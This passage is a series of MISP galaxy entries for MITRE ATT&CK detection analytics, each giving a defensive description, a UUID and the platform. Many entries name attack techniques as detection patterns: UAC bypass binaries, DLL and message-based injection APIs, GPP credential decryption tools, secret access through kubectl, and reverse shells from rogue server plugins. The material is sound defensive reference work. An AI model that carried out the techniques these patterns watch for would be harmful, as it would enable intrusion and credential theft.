1) New or updated software is delivered/installed from atypical sources or with signature/hash mismatches; 2) installer/updater writes binaries to unexpected paths or replaces existing signed files; 3) first run causes unsigned/abnormally signed modules to load or child processes to execute, optionally followed by network egress to new destinations.

Internal MISP references

UUID a6b1e74e-6c05-4d9f-928c-63ddf558798b which can be used as unique global reference for Analytic 1480 - AN1480 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1480
mitre_platforms ['Windows']

Analytic 0481 - AN0481

Defenders should monitor for suspicious enumeration of cloud infrastructure components via APIs or CLI tools. Observable behaviors include repeated listing or description operations for compute instances, snapshots, storage buckets, and volumes. From a defender’s perspective, risky activity is often identified by new or untrusted identities making discovery calls (e.g., DescribeInstances, ListBuckets, az vm list, gcloud compute instances list), enumeration from unusual geolocations or IPs, or rapid multi-service discovery in sequence. Correlating discovery API usage with later snapshot creation or instance modification provides further context of adversary behavior.

Internal MISP references

UUID a9372c6a-8d3b-420a-ad9d-8ef8d284205f which can be used as unique global reference for Analytic 0481 - AN0481 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0481
mitre_platforms ['IaaS']

Analytic 0148 - AN0148

Delivery of suspicious internal communication (e.g., Thunderbird, Evolution) using compromised internal accounts. Sequence of: unexpected user activity + mail transfer logs + download or execution of attachments.

Internal MISP references

UUID b5b53b9d-f72b-4cd5-946b-d1ddfdad3c0f which can be used as unique global reference for Analytic 0148 - AN0148 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0148
mitre_platforms ['Linux']

Analytic 1804 - AN1804

Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of ps or inspection of the /proc directory.

Internal MISP references

UUID 5c5225c4-2d35-431e-830d-ea1cc649c6ba which can be used as unique global reference for Analytic 1804 - AN1804 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1804
mitre_platforms ['Android']

Analytic 1840 - AN1840

Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 983ae9ea-a125-498a-862d-00d5bed2087a which can be used as unique global reference for Analytic 1840 - AN1840 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1840
mitre_platforms ['Android']

Analytic 0491 - AN0491

Flood of incoming TLS or HTTP(S) connections to macOS-hosted services (e.g., MAMP, Apache), causing high CPU usage and system unresponsiveness.

Internal MISP references

UUID 00bf6b2e-444a-4a83-aafd-43bc8eea4594 which can be used as unique global reference for Analytic 0491 - AN0491 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0491
mitre_platforms ['macOS']

Analytic 1094 - AN1094

Detects a multi-event behavior chain involving UAC bypass attempts via known auto-elevated binaries (e.g., eventvwr.exe, sdclt.exe), unauthorized Registry changes to UAC-related keys, and anomalous process execution with elevated privileges but lacking standard parent-child lineage. Suspicious patterns include invocation of auto-elevated COM objects or manipulation of isolatedCommand Registry entries without consent prompts.

Internal MISP references

UUID 13a875c4-87d2-448e-a46e-970e1f9ad5da which can be used as unique global reference for Analytic 1094 - AN1094 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1094
mitre_platforms ['Windows']

Analytic 1940 - AN1940

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 193167de-400a-4ea3-a8db-93e4bf628068 which can be used as unique global reference for Analytic 1940 - AN1940 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1940
mitre_platforms ['PRE']

Analytic 0941 - AN0941

Detects the use of message-based injection by monitoring for sequences involving FindWindow (EnumWindows or EnumChildWindows), VirtualAllocEx or related API calls, combined with suspicious PostMessage/SendMessage (e.g., LVM_SETITEMPOSITION) use to SysListView32 controls, followed by LVM_SORTITEMS invocation instead of WriteProcessMemory.

Internal MISP references

UUID 217128c5-144d-492b-ab72-bd0704348221 which can be used as unique global reference for Analytic 0941 - AN0941 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0941
mitre_platforms ['Windows']

Analytic 0149 - AN0149

Abnormal Apple Mail use, including internal email relays followed by file execution or script events (e.g., attachments launched via Preview, a terminal triggered from Mail.app).

Internal MISP references

UUID 3533fba3-e80d-4ad0-be45-62460b28ad7c which can be used as unique global reference for Analytic 0149 - AN0149 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0149
mitre_platforms ['macOS']

Analytic 1490 - AN1490

Unusual long-running processes consuming high CPU cycles (e.g., via 'top' or 'ps') initiated via cron, shell scripts, or Docker. Connections to known mining pools or DNS over HTTPS usage as evasion.

Internal MISP references

UUID 45a34d76-16aa-45ac-9419-ffbc5d2e090d which can be used as unique global reference for Analytic 1490 - AN1490 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1490
mitre_platforms ['Linux']

Analytic 0419 - AN0419

Forged SAML tokens in IaaS environments often manifest as cross-cloud or cross-account authentication without matching STS events. Defenders may see AssumeRole or GetFederationToken API usage without a corresponding SAML assertion log from the trusted IdP.

Internal MISP references

UUID 5c6e9102-b3ef-4eaa-85c1-bb5702df0f45 which can be used as unique global reference for Analytic 0419 - AN0419 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0419
mitre_platforms ['IaaS']

Analytic 0194 - AN0194

Detects file transfers or mounting operations from remote hosts followed by write actions into a local staging directory, often using SMB or remote shell activity.

Internal MISP references

UUID 7efd6a7b-d7c0-4922-a1df-c492c0a2d3f8 which can be used as unique global reference for Analytic 0194 - AN0194 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0194
mitre_platforms ['Windows']

Analytic 1049 - AN1049

Shell scripts or binaries invoking repeated 'sleep', 'ping', or low-level syscalls (e.g., nanosleep) in short-lived execution chains with no user or system interaction. Frequently seen in malicious cron jobs or payload stagers.

Internal MISP references

UUID dcc422d4-90fc-4e2a-afd5-b4fbc3d6c4a1 which can be used as unique global reference for Analytic 1049 - AN1049 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1049
mitre_platforms ['Linux']

Analytic 0914 - AN0914

Detects ELF binaries written to disk that demonstrate anomalous file size or entropy, quickly followed by execution or memory region writes into remote processes (e.g., using ptrace).

Internal MISP references

UUID f606ec01-15d2-4432-b91b-669411205015 which can be used as unique global reference for Analytic 0914 - AN0914 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0914
mitre_platforms ['Linux']

Analytic 1409 - AN1409

Detects SVGs downloaded via browser that invoke AppleScript, osascript, or JavaScriptCore processes, followed by network egress or file drop to LaunchAgents or ~/Library.

Internal MISP references

UUID fe1cff12-9772-4ba9-92bc-c26eae79da24 which can be used as unique global reference for Analytic 1409 - AN1409 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1409
mitre_platforms ['macOS']

Analytic 0155 - AN0155

Detection of malicious certificate installation via monitoring execution of the security add-trusted-cert command and modifications to system keychains.

Internal MISP references

UUID 477fb167-a388-4e85-856b-bdcb36e7fd95 which can be used as unique global reference for Analytic 0155 - AN0155 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0155
mitre_platforms ['macOS']

Analytic 0515 - AN0515

Use of native macOS tools (sharing -l, smbutil view, mount_smbfs) or scripts to enumerate SMB shares across many hosts, followed by outbound SMB connections observed in PF/Zeek logs.

Internal MISP references

UUID 5a9238a9-acd0-44f0-bd41-f86ef433775b which can be used as unique global reference for Analytic 0515 - AN0515 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0515
mitre_platforms ['macOS']

Analytic 1550 - AN1550

Adversary adds IDE extensions or plugins (VS Code, JetBrains Toolbox/EAP, Eclipse) via GUI or CLI, possibly via managed profiles. Chain: process start with install/update flags → plist/extension folder changes under ~/Library/Application Support/Code or ~/Library/Application Support/JetBrains → outbound connections to marketplaces/tunnel services → optional helper (ssh/node) spawned.

Internal MISP references

UUID 77d3146f-2066-40a9-872e-ec05d7a4d6d1 which can be used as unique global reference for Analytic 1550 - AN1550 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1550
mitre_platforms ['macOS']

Analytic 1055 - AN1055

Track creation or update of SaaS automation scripts (e.g., Google Workspace Apps Script). Detect when these scripts are bound to user events such as file opens or account modifications, and correlate with subsequent abnormal API calls that exfiltrate or modify user data.

Internal MISP references

UUID 8708dc0b-8eeb-4a3d-8770-2fab30f46682 which can be used as unique global reference for Analytic 1055 - AN1055 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1055
mitre_platforms ['SaaS']

Analytic 0551 - AN0551

Suspicious creation or modification of inbox rules through PowerShell (New-InboxRule, Set-InboxRule) to automatically delete, move, or hide emails. Defender perspective: unusual rule activity correlated with mailbox access and filtering patterns.

Internal MISP references

UUID a09ed72b-be04-475f-8c0a-11ed47b40bd1 which can be used as unique global reference for Analytic 0551 - AN0551 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0551
mitre_platforms ['Windows']

Analytic 1505 - AN1505

Detects unexpected access or usage of cloud productivity tools (e.g., downloading large numbers of files, creating external shares) by internal users.

Internal MISP references

UUID ac36f883-9a5b-4796-9f2e-18f1cce8fc0b which can be used as unique global reference for Analytic 1505 - AN1505 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1505
mitre_platforms ['SaaS']

Analytic 1065 - AN1065

Detects use of gzip, base64, tar, or openssl in scripts or commands that encode/encrypt files after file staging or system enumeration.

Internal MISP references

UUID 3e7ff1f9-57e2-44f4-8dc1-20d1a1652f73 which can be used as unique global reference for Analytic 1065 - AN1065 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1065
mitre_platforms ['Linux']

Analytic 1560 - AN1560

Processes executing binaries named after legitimate system utilities (e.g., net.exe, findstr.exe, python.exe) from non-standard or application-specific directories, combined with file creation or modification events for such binaries. Defender correlates file writes in vulnerable directories, process execution paths inconsistent with baseline system paths, and abnormal parent-child relationships in process lineage.

Internal MISP references

UUID 578c821c-f8e3-45e7-a9b4-9aed6c84309a which can be used as unique global reference for Analytic 1560 - AN1560 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1560
mitre_platforms ['Windows']

Analytic 1506 - AN1506

Detects login and usage patterns deviating from typical Microsoft 365 or Google Workspace user profiles.

Internal MISP references

UUID 5f1ffd26-01f7-47fc-b544-130fc14c0bd2 which can be used as unique global reference for Analytic 1506 - AN1506 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1506
mitre_platforms ['Office Suite']

Analytic 0561 - AN0561

Execution of ifconfig, networksetup, or system_profiler to query IP/MAC/interface configuration and status.

Internal MISP references

UUID 79c196d7-abb8-4766-a875-4acafc6f059d which can be used as unique global reference for Analytic 0561 - AN0561 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0561
mitre_platforms ['macOS']

Analytic 0156 - AN0156

Detects suspicious memory access attempts targeting the securityd process. Observes tools invoking process memory read operations (e.g., ptrace, task_for_pid) against securityd. Correlates with anomalous parent process lineage, root privilege escalation, or repeated unauthorized attempts.

Internal MISP references

UUID 94628b16-2443-4e66-9f7b-a61a39012a9c which can be used as unique global reference for Analytic 0156 - AN0156 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0156
mitre_platforms ['macOS']

Analytic 1605 - AN1605

Adversary invokes 'useradd', 'adduser', or equivalent system commands or scripts to create local users. Detection focuses on command execution and audit trail of passwd/shadow file modifications.

Internal MISP references

UUID 9d70d90c-f318-4318-a18d-e4775ffa229e which can be used as unique global reference for Analytic 1605 - AN1605 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1605
mitre_platforms ['Linux']

Analytic 0615 - AN0615

Detection of ESXi escape attempts by monitoring for anomalies in hypervisor logs such as unexpected VM operations, privilege escalation events, or attempts to load malicious kernel modules within the hypervisor environment.

Internal MISP references

UUID 9f5f193f-6aef-4586-a047-492b0c651001 which can be used as unique global reference for Analytic 0615 - AN0615 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0615
mitre_platforms ['ESXi']

Analytic 1056 - AN1056

Monitor for creation or modification of udev rules files in key directories (/etc/udev/rules.d/, /lib/udev/rules.d/, /usr/lib/udev/rules.d/). Look for RUN+= or IMPORT keys invoking suspicious binaries or scripts. Correlate this with process execution from systemd-udevd context, and file writes near udev reload/restart events. Combine this with unexpected background process spawning from udevd-related forks.

Internal MISP references

UUID c1167779-9df4-4387-b777-4da097c6b033 which can be used as unique global reference for Analytic 1056 - AN1056 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1056
mitre_platforms ['Linux']

Analytic 0516 - AN0516

Correlate suspicious file transfers over SMB or Admin$ shares with process creation events (e.g., cmd.exe, powershell.exe, certutil.exe) that do not align with normal administrative behavior. Detect remote file writes followed by execution of transferred binaries.

Internal MISP references

UUID ce0f284b-f8d9-4cb0-84ad-97e1e8390d0c which can be used as unique global reference for Analytic 0516 - AN0516 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0516
mitre_platforms ['Windows']

Analytic 0651 - AN0651

Detect the creation or modification of common media file formats (e.g., .jpg, .png, .wav) following suspicious process activity like compression or encryption, especially when paired with lateral movement or exfiltration behavior.

Internal MISP references

UUID e7be37f1-88f9-45e3-91d0-1ff37bc94892 which can be used as unique global reference for Analytic 0651 - AN0651 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0651
mitre_platforms ['Windows']

Analytic 0165 - AN0165

Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded).

Internal MISP references

UUID f20d9241-84cc-4393-b2fb-798241da73fa which can be used as unique global reference for Analytic 0165 - AN0165 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0165
mitre_platforms ['Windows']

Analytic 1650 - AN1650

Application vetting services could look for android.permission.READ_CALL_LOG in an Android application’s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 9ed67778-6277-4e12-aa3e-29f39a81e67a which can be used as unique global reference for Analytic 1650 - AN1650 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1650
mitre_platforms ['Android']

Analytic 0517 - AN0517

Monitor scp, rsync, curl, sftp, or ftp processes initiating transfers to internal systems combined with file creation events in unusual directories. Correlate transfer activity with subsequent execution of those binaries.

Internal MISP references

UUID 24af9441-602e-4202-a2e7-04a46c008406 which can be used as unique global reference for Analytic 0517 - AN0517 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0517
mitre_platforms ['Linux']

Analytic 0571 - AN0571

Detection correlates anomalous Docker or Kubernetes API requests with access to logs, secrets, or service accounts. Observes unauthorized use of docker logs, kubectl get secrets, or direct API calls to Kubernetes API server endpoints. Identifies behavioral patterns where adversaries escalate from basic pod/container interaction to privileged API calls exposing sensitive credential material.

Internal MISP references

UUID 2d054232-8968-4d11-b742-536b70bbb1ba which can be used as unique global reference for Analytic 0571 - AN0571 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0571
mitre_platforms ['Containers']

Analytic 1570 - AN1570

Defenders may observe adversary attempts to downgrade system images by monitoring for anomalous file transfers of OS image files (via TFTP, FTP, SCP), configuration changes pointing boot system variables to older image files, unexpected OS version strings after reboot, and checksum mismatches against approved baseline images. Suspicious chains include transfer of an older image, alteration of boot configuration, and reboot/reload of the device. Adversaries may also tamper with CLI output to disguise downgrade attempts, requiring independent validation of OS version and integrity.

Internal MISP references

UUID 370daadc-e640-4487-8ba0-c897f46459bc which can be used as unique global reference for Analytic 1570 - AN1570 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1570
mitre_platforms ['Network Devices']

Analytic 0715 - AN0715

Execution of known or custom VNC/remote desktop daemons or tunneling agents that initiate external communication after launch.

Internal MISP references

UUID 77769a6d-f3f4-42f1-a9a7-0d1096563115 which can be used as unique global reference for Analytic 0715 - AN0715 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0715
mitre_platforms ['Linux']

Analytic 1057 - AN1057

Detects processes performing network enumeration (e.g., port scans, service probing) by correlating process creation, socket connections, and sequential destination IP probing within a time window.

Internal MISP references

UUID 84299e85-2a7e-4f78-9767-3d29aa58857a which can be used as unique global reference for Analytic 1057 - AN1057 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1057
mitre_platforms ['Windows']

Analytic 0157 - AN0157

Detects adversaries attempting to attach debuggers or memory dump utilities to credential storage daemons analogous to macOS securityd. Observes ptrace syscalls, /proc//mem access, or gcore dumps against sensitive processes. Correlates anomalies with privilege escalation or credential dumping attempts.

Internal MISP references

UUID 9e0af3ac-dfeb-48c3-8d15-5f9edd69be69 which can be used as unique global reference for Analytic 0157 - AN0157 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0157
mitre_platforms ['Linux']

Analytic 0751 - AN0751

SSH session from new source IP followed by interactive shell or privilege escalation (e.g., sudo, su) and outbound lateral connection.

Internal MISP references

UUID a366262a-ba79-4b74-be16-0b139d546651 which can be used as unique global reference for Analytic 0751 - AN0751 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0751
mitre_platforms ['Linux']

Analytic 0175 - AN0175

Detects Python script or interpreter execution on ESXi hosts via embedded BusyBox shells, nested installations, or dropped files via SSH or datastore mount. Flags unusual scripting or post-compromise enumeration behavior.

Internal MISP references

UUID aff39b79-72c6-4cf9-8ddf-1332252580d5 which can be used as unique global reference for Analytic 0175 - AN0175 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0175
mitre_platforms ['ESXi']

Analytic 1075 - AN1075

Correlates file enumeration of XML files in the SYSVOL share with suspicious process execution that decodes or reads encrypted credentials embedded in Group Policy Preference files (e.g., Get-GPPPassword.ps1, gpprefdecrypt.py, Metasploit). Detects abnormal access to \\DOMAIN\SYSVOL combined with XML file parsing or decryption logic.

Internal MISP references

UUID e14e67af-6f6e-47d6-aa19-4012ea99284c which can be used as unique global reference for Analytic 1075 - AN1075 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1075
mitre_platforms ['Windows']

Analytic 1507 - AN1507

Installation of malicious IIS/Apache/SQL server modules that later execute command-line interpreters or establish outbound connections.

Internal MISP references

UUID ea250997-091b-4c5e-8827-a41f03e34caf which can be used as unique global reference for Analytic 1507 - AN1507 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1507
mitre_platforms ['Windows']

Analytic 1705 - AN1705

Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as search application packages for strings that correlate to known password store locations. Mobile security products can potentially detect jailbroken devices.

Internal MISP references

UUID 1a27d3ed-86e8-4389-927d-1d43d94dc719 which can be used as unique global reference for Analytic 1705 - AN1705 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1705
mitre_platforms ['iOS']

Analytic 1750 - AN1750

Application vetting services could look for use of standard APIs (e.g. the clipboard API) that could indicate data manipulation is occurring.

Internal MISP references

UUID 332065d4-9895-485b-8674-756f4d3fab7c which can be used as unique global reference for Analytic 1750 - AN1750 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1750
mitre_platforms ['Android']

Analytic 1085 - AN1085

A process outside of interactive shell context reads ~/.bash_history directly (e.g., using cat, less, grep), often shortly after privilege escalation or user switch (su/sudo). This may be followed by credential scanning in memory or file writes to new locations.

Internal MISP references

UUID 12be6c5f-213a-464f-b780-ac06f20ab763 which can be used as unique global reference for Analytic 1085 - AN1085 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1085
mitre_platforms ['Linux']

Analytic 1058 - AN1058

Detects use of network scanning utilities or scripts performing rapid connections to multiple services or hosts using auditd and netflow/pcap telemetry.

Internal MISP references

UUID 287661d0-714e-4bb4-a9f7-c272ad0018b1 which can be used as unique global reference for Analytic 1058 - AN1058 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1058
mitre_platforms ['Linux']

Analytic 0851 - AN0851

User or remote input triggers application crash or segmentation fault (e.g., SIGSEGV) with service recovery attempts, observed via audit logs and systemd journaling.

Internal MISP references

UUID 2f4d199c-4d62-4d7d-8c6e-3ec358c22e76 which can be used as unique global reference for Analytic 0851 - AN0851 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0851
mitre_platforms ['Linux']

Analytic 0518 - AN0518

Detect anomalous use of scp, rsync, curl, or third-party sync apps transferring executables into user directories. Correlate new file creation with immediate execution events.

Internal MISP references

UUID 34d6af16-fe37-458c-b15c-413ff2d5b2f7 which can be used as unique global reference for Analytic 0518 - AN0518 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0518
mitre_platforms ['macOS']

Analytic 1580 - AN1580

Detects snapshot sharing, backup exports, or data object transfers from victim-owned cloud accounts to other cloud identities within the same provider (e.g., AWS, Azure) using snapshot sharing, S3 bucket policy updates, or SAS URI generation.

Internal MISP references

UUID 383dda28-1d76-4605-a53d-07829f3d7ef8 which can be used as unique global reference for Analytic 1580 - AN1580 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1580
mitre_platforms ['IaaS']

Analytic 0158 - AN0158

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID 55ec66de-8146-4fd0-a423-0954d6ba33ef which can be used as unique global reference for Analytic 0158 - AN0158 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0158
mitre_platforms ['Windows']

Analytic 0185 - AN0185

Chain: (1) a new external device is recognized by Windows (USB/Thunderbolt/PCIe) or a new block device appears; (2) within a short window, the same user/session spawns processes or the OS mounts a new volume; (3) optional follow-on activity such as HID keystroke injection, DMA driver load, or new network interface MAC on DHCP. Correlate Security EID 6416 / Kernel-PnP with sysmon and DHCP/network metadata.

Internal MISP references

UUID 61d89912-f74e-4fde-ae7a-591e8c7c5739 which can be used as unique global reference for Analytic 0185 - AN0185 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0185
mitre_platforms ['Windows']

Analytic 1508 - AN1508

Abuse of extensible server modules (e.g., Apache, Nginx, Tomcat) to load rogue plugins that initiate bash, connect to C2, or spawn reverse shells.

Internal MISP references

UUID 65f89c21-d42a-4028-9865-122ea1079a77 which can be used as unique global reference for Analytic 1508 - AN1508 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1508
mitre_platforms ['Linux']

Analytic 0815 - AN0815

Detects registration of new PTA agents, conditional access changes disabling hybrid MFA enforcement, or suspicious updates to AD FS token-signing configurations.

Internal MISP references

UUID e1063b92-9be0-4d25-9df5-bae4171c8153 which can be used as unique global reference for Analytic 0815 - AN0815 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0815
mitre_platforms ['Identity Provider']

Analytic 0581 - AN0581

Execution of XSL scripts via msxsl.exe or wmic.exe using embedded JScript or VBScript for proxy execution. Detection correlates process creation, command-line patterns, and module load behavior of scripting components (e.g., jscript.dll).

Internal MISP references

UUID f313053f-5898-4f47-b263-a60098f5c963 which can be used as unique global reference for Analytic 0581 - AN0581 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0581
mitre_platforms ['Windows']

Analytic 1805 - AN1805

Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of ps or inspection of the /proc directory.

Internal MISP references

UUID 5d07c07e-4cde-41b9-a03e-94be43ca9bb8 which can be used as unique global reference for Analytic 1805 - AN1805 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1805
mitre_platforms ['iOS']

Analytic 1850 - AN1850

Hooking can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID dd1b3351-f8e5-480e-9e7d-f9cfbbf01409 which can be used as unique global reference for Analytic 1850 - AN1850 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1850
mitre_platforms ['Android']

Analytic 0195 - AN0195

Detects inbound SCP, rsync, or NFS mounts from remote systems followed by aggregation of files into known staging paths like /mnt/staging or /var/tmp.

Internal MISP references

UUID 14ac0f26-e5db-42da-b730-9e115027f8e9 which can be used as unique global reference for Analytic 0195 - AN0195 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0195
mitre_platforms ['Linux']

Analytic 1059 - AN1059

Detects Bonjour-based mDNS enumeration or use of system tools (e.g., dns-sd, nmap) to find active services via multicast probing or targeted scans.

Internal MISP references

UUID 28fbe1b0-9663-4997-9d4e-ef43803be114 which can be used as unique global reference for Analytic 1059 - AN1059 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1059
mitre_platforms ['macOS']

Analytic 0591 - AN0591

Use of domain accounts via sssd or winbind for logon activity outside of typical patterns, especially on sensitive systems or with lateral movement tools.

Internal MISP references

UUID 74aade7b-b61a-46d0-a68b-33fba4f09f6e which can be used as unique global reference for Analytic 0591 - AN0591 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0591
mitre_platforms ['Linux']

Analytic 1950 - AN1950

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 8722b13a-1b20-4f2e-991b-153a26bba2a8 which can be used as unique global reference for Analytic 1950 - AN1950 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1950
mitre_platforms ['PRE']

Analytic 0951 - AN0951

Monitors binary modification in /Applications and system library paths. Detects unsigned or improperly signed binaries executed after modification. Tracks Gatekeeper or notarization bypass attempts tied to modified binaries.

Internal MISP references

UUID 88eaf8ce-b48d-4329-a147-dd5d065cead2 which can be used as unique global reference for Analytic 0951 - AN0951 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0951
mitre_platforms ['macOS']

Analytic 1095 - AN1095

Detects DLL injection through correlation of memory allocation and writing to remote process memory (e.g., VirtualAllocEx, WriteProcessMemory), followed by remote thread creation (e.g., CreateRemoteThread) that loads a suspicious or unsigned DLL using LoadLibrary or reflective loading.

Internal MISP references

UUID a06e9154-5584-4f5d-be47-b420d79674c7 which can be used as unique global reference for Analytic 1095 - AN1095 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1095
mitre_platforms ['Windows']

Analytic 1590 - AN1590

Creation or modification of Apple Mail rules by accessing plist files or GUI automation (AppleScript).

Internal MISP references

UUID c93edcb2-385a-4472-a9db-ace5371250eb which can be used as unique global reference for Analytic 1590 - AN1590 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1590
mitre_platforms ['macOS']

Analytic 1509 - AN1509

Malicious use of webserver plugins (e.g., for nginx, PHP, Node.js) that execute AppleScript or open network sockets.

Internal MISP references

UUID d5af4c93-632c-41c3-a101-6e9e534d7d01 which can be used as unique global reference for Analytic 1509 - AN1509 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1509
mitre_platforms ['macOS']

Analytic 0159 - AN0159

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID dc4096a9-b89d-4bef-b20d-58cf5e87f6bf which can be used as unique global reference for Analytic 0159 - AN0159 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0159
mitre_platforms ['Linux']

Analytic 0519 - AN0519

Identify lateral transfer via datastore file uploads or internal scp/ssh sessions that result in new VMX/VMDK or script files. Correlate transfer with VM execution or datastore modification.

Internal MISP references

UUID f8857048-181f-4883-a50b-65aca5204228 which can be used as unique global reference for Analytic 0519 - AN0519 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0519
mitre_platforms ['ESXi']

Analytic 0915 - AN0915

Identifies Mach-O binaries dropped into temporary directories with abnormally high binary size or padding patterns, followed by privilege escalation, exec, or memory mapping of other processes.

Internal MISP references

UUID fcc2b0dc-93c4-49de-abfe-6273c24d1d89 which can be used as unique global reference for Analytic 0915 - AN0915 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0915
mitre_platforms ['macOS']

Analytic 1066 - AN1066

